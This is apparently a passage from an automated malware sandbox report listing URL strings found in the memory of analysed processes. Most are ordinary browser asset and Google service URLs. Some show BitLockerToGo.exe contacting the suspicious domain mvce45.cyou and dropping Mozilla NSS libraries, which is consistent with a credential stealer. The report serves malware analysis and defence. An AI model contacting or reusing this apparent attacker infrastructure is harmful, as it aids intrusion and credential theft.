                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.dr, HubApps Icons.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://gaana.com/
                          Source: chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/A
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/H
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/J
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/V
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/g
                          Source: chrome.exe, 00000007.00000003.2154140903.00002FC00264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/i
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/r
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/t
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/x
                          Source: chrome.exe, 00000007.00000003.2154140903.00002FC00264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                          Source: chrome.exe, 00000007.00000003.2149049553.00002FC00298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149300925.00002FC00299C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/S
                          Source: chrome.exe, 00000007.00000003.2093917427.00005C9400878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2154230659.00002FC002650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                          Source: msedge.exe, 0000000B.00000002.2321715053.00006FE8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, BGDAAE.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                          Source: msedge.exe, 0000000B.00000003.2235035920.00006FE80038C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                          Source: chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                          Source: chrome.exe, 00000007.00000003.2149467478.00002FC0029B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149403583.00002FC0029B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                          Source: chrome.exe, 00000007.00000003.2149467478.00002FC0029B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2149403583.00002FC0029B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard/
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                          Source: chrome.exe, 00000007.00000003.2150721994.00005C9400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                          Source: chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158236324.00002FC002BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                          Source: chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                          Source: chrome.exe, 00000007.00000003.2115866965.00002FC00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115530307.00002FC000314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                          Source: chrome.exe, 00000007.00000003.2093917427.00005C9400878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2115781780.00002FC0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                          Source: chrome.exe, 00000007.00000003.2093099812.00005C940071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                          Source: chrome.exe, 00000007.00000003.2148608475.00002FC00240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://m.kugou.com/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://m.soundcloud.com/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://m.vk.com/
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                          Source: chrome.exe, 00000007.00000003.2164352470.00002FC002D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2158236324.00002FC002BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2157940006.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2161928831.00002FC002C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2162237036.00002FC002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                          Source: chrome.exe, 00000007.00000003.2149161870.00002FC0012A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                          Source: BitLockerToGo.exe, 00000003.00000002.2681603377.000000001BA06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2694487717.0000000039730000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2684169315.000000002197D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2659522028.0000000003314000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2689420250.000000002D85A000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                          Source: msedge.exe, 0000000B.00000002.2321715053.00006FE8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                          Source: msedge.exe, 0000000B.00000002.2321715053.00006FE8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://music.amazon.com
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://music.apple.com
                          Source: 5b89db5d-7bca-40c9-b5ad-87393e6361a9.tmp.13.drString found in binary or memory: https://music.yandex.com
                          Source: BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou
                          Source: BitLockerToGo.exe, 00000003.00000003.2289942635.00000000031DF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2169542860.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2169089850.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2658570144.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2289691748.00000000031DB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2168516828.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2672447504.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2288889155.00000000031D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/
                          Source: BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/#E
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/)
                          Source: BitLockerToGo.exe, 00000003.00000002.2672327052.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2660591865.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/000
                          Source: BitLockerToGo.exe, 00000003.00000003.2660816657.0000000003234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/5
                          Source: BitLockerToGo.exe, 00000003.00000003.1942242351.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1918342759.000000000316A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1990478086.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1965990439.000000000316B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1894034954.0000000003171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/6E
                          Source: BitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/AN
                          Source: BitLockerToGo.exe, 00000003.00000003.2378639595.00000000031E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/B
                          Source: BitLockerToGo.exe, 00000003.00000003.2169542860.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2169089850.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2168516828.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mvce45.cyou/CDu
